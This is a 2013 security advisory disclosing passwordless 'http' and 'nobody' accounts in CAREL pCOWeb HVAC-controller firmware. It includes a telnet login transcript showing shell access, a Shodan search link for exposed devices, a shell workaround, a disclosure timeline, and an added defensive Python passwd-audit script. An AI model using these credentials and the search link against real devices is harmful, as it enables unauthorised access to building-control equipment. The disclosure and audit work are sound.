
CAREL pCOWeb 1.5.0 Default Credential Shell Access

Posted on 23 May 2013
Source: packetstormsecurity.org

 

Title: CAREL pCOWeb firmware version 1.5.0 and lower passwordless accounts

Author: xistence ( xistence[at]0x90[.]nl )

Software link: http://ksa.carel.com/documents/10451/30816/pCOWeb_1_5_0.zip

Vendor site:
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_mercato=4&id_gamma=39&id_prodotto=350

Shodan: http://www.shodanhq.com/search?q=pCOWeb

Description: CAREL pCOWeb is an interface used in "air-conditioning
controls", "refrigeration controls" and "telemaintenance systems".

Vulnerability: Passwordless accounts

The CAREL pCOWeb firmware version 1.5.0 and lower ships an /etc/passwd
containing the following 2 accounts with an empty password field:

http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash

Logging in through telnet without a password is possible, and these
accounts can be neither seen nor changed through the web interface.

The "http" user basically has access to all files (including /etc/passwd,
which contains the hashes for the root user), as it is in almost every group:

$ telnet <ip>

Linux 2.4.21-rmk1 (localhost) (ttya0)

localhost login: http
No directory /usr/http/root!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[http@localhost14:35:47 /]$ id
uid=48(http) gid=48(http)
groups=48(http),200(httpadmin),500(carel),80(update)

Solution (workaround):
Log in with telnet and set a password, or change the shell from "/bin/bash"
to "/bin/nologin".
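
The finding and the shell workaround above, as an added example that is not part of the original advisory: a Python audit of a passwd file (for instance one taken from an unpacked firmware image) that flags accounts with an empty password field and a login shell, then confirms the workaround clears them. The root entry, its placeholder hash and all function names are constructed for illustration.

```python
# Shells that refuse interactive login; "/bin/nologin" is the one the advisory names.
NON_LOGIN_SHELLS = {"/bin/nologin", "/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}

# The two accounts quoted in the advisory plus a constructed root entry
# (the hash is a placeholder, not a value from the device).
SAMPLE_PASSWD = """\
root:$1$PLACEHOLDER$constructedhash:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
"""


def parse_passwd(text):
    """Yield (name, password_field, shell) for each seven-field passwd line."""
    for raw in text.splitlines():
        fields = raw.strip().split(":")
        if len(fields) == 7:  # skip blank, comment and malformed lines
            yield fields[0], fields[1], fields[6]


def passwordless_logins(text):
    """Return names of accounts with an empty password field and a login shell."""
    findings = []
    for name, password, shell in parse_passwd(text):
        shell = shell or "/bin/sh"  # passwd(5): an empty shell field defaults to /bin/sh
        if password == "" and shell not in NON_LOGIN_SHELLS:
            findings.append(name)
    return findings


def apply_workaround(text, shell="/bin/nologin"):
    """Return passwd text with the advisory's shell workaround applied to flagged accounts."""
    flagged = set(passwordless_logins(text))
    out = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] in flagged:
            fields[6] = shell
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", passwordless_logins(SAMPLE_PASSWD))
    print("after: ", passwordless_logins(apply_workaround(SAMPLE_PASSWD)))
```

Entries whose password field is "*" or "!" are locked rather than passwordless, so the check does not report them.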

[*] 01-25-2013 Contacted vendor
[*] 01-25-2013 Vendor responded that they will release an updated firmware, supplied workaround
[*] 05-22-2013 No updated firmware released, public disclosure

 
